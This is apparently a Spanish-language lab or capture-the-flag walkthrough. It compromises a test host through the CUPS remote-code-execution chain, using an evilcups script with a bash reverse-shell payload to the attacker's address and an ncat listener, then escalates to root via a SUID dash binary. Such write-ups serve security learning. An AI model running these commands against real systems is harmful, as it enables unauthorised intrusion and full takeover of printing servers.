Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.129❯ nmap -sCV -p 22,80,631 -oN 02-targeted.txt 192.168.1.129
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-26 18:07 -03
Nmap scan report for 192.168.1.129
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.56 (Debian)
631/tcp open ipp CUPS 2.3
|_http-server-header: CUPS/2.3 IPP/2.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Inicio - CUPS 2.3.3op2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 secondsEl puerto 631 corre CUPS 2.3, vulnerable a la cadena de RCE de CUPS. La explotamos con el script evil-cups, que registra una impresora maliciosa con un comando inyectado:
❯ python3 evilcups.py 192.168.1.7 192.168.1.129 "bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'"
IPP Server Listening on ('192.168.1.7', 12345)
Sending udp packet to 192.168.1.129:631...
Please wait this normally takes 30 seconds...Accedemos a http://192.168.1.129:631/printers/ e imprimimos una página de prueba en la impresora maliciosa para disparar el comando, recibiendo la shell como lp:
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 192.168.1.129:47160.
bash: cannot set terminal process group (559): Inappropriate ioctl for device
bash: no job control in this shell
lp@fuser:/$Para escalar privilegios, buscamos binarios con el bit SUID:
lp@fuser:/$ find / -perm -4000 2>/dev/null
...
/usr/bin/dash
...dash tiene el bit SUID, así que lanzamos una shell privilegiada con -p (preservando el UID efectivo de root):
lp@fuser:/$ dash -p
whoami
rootObtenemos las flags y fin.